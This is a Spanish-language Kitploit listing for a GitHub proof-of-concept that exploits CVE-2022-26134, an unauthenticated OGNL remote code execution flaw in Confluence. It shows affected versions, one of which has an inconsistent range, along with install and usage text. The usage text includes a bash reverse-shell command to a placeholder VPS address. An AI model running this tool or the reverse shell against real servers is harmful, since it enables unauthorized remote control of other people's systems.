Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2022-26134 — Un atacante remoto, sin autenticación en Confluence, puede construir expresiones OGNL para inyectarlas, logrando ejecutar código arbitrario en Confluence Server o Data Center. Se ha modificado el PoC en el script existente para facilitar getshell. | Kitploit
Herramientas/GitHubGitHub/keven1z/cve-2022-26134
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebComando y Control
GitHubkeven1z/cve-2022-26134

CVE-2022-26134

Un atacante remoto, sin autenticación en Confluence, puede construir expresiones OGNL para inyectarlas, logrando ejecutar código arbitrario en Confluence Server o Data Center. Se ha modificado el PoC en el script existente para facilitar getshell.

Ver Repositorio
72hace 4 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2022-26134

Un atacante remoto, sin autenticación, puede construir expresiones OGNL para inyectar y lograr la ejecución de código arbitrario en Confluence Server o Data Center. Se ha modificado el PoC para facilitar la obtención de un shell. Puerto común: 8090

Versiones afectadas

  • Confluence Server and Data Center >= 1.3.0
  • 7.14.0 <= Confluence Server and Data Center < 7.4.17
  • 7.13.0 <= Confluence Server and Data Center < 7.13.7
  • 7.14.0 <= Confluence Server and Data Center < 7.14.3
  • 7.15.0 <= Confluence Server and Data Center < 7.15.2
  • 7.16.0 <= Confluence Server and Data Center < 7.16.4
  • 7.17.0 <= Confluence Server and Data Center < 7.17.4
  • 7.18.0 <= Confluence Server and Data Center < 7.18.1

Instrucciones de uso

root@kitploit:~
pip3 install requests
root@kitploit:~
	   ______     _______     ____   ___ ____  ____      ____   __   _ _____ _  _   
  / ___\ \   / | ____|   |___ \ / _ |___ \|___ \    |___ \ / /_ / |___ /| || |  
 | |    \ \ / /|  _| _____ __) | | | |__) | __) _____ __) | '_ \| | |_ \| || |_ 
 | |___  \ V / | |__|_____/ __/| |_| / __/ / __|_____/ __/| (_) | |___) |__   _|
  \____|  \_/  |_____|   |_____|\___|_____|_____|   |_____|\___/|_|____/   |_|  
    
usage: CVE-2022-26134.py [-h] -t TARGET -c COMMAND

CVE-2022-26134

optional arguments:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        URL objetivo
  -c COMMAND, --command COMMAND
                        Comando a ejecutar (execute command), obtener shell: /bin/bash -c bash -i >& /dev/tcp/{vps ip}/{vps port} 0>&1

Uso

root@kitploit:~
python3 CVE-2022-26134.py -t [server ip] -c [command] //执行命令

Este script solo se puede usar para pruebas, no para otros fines.

Descargar herramienta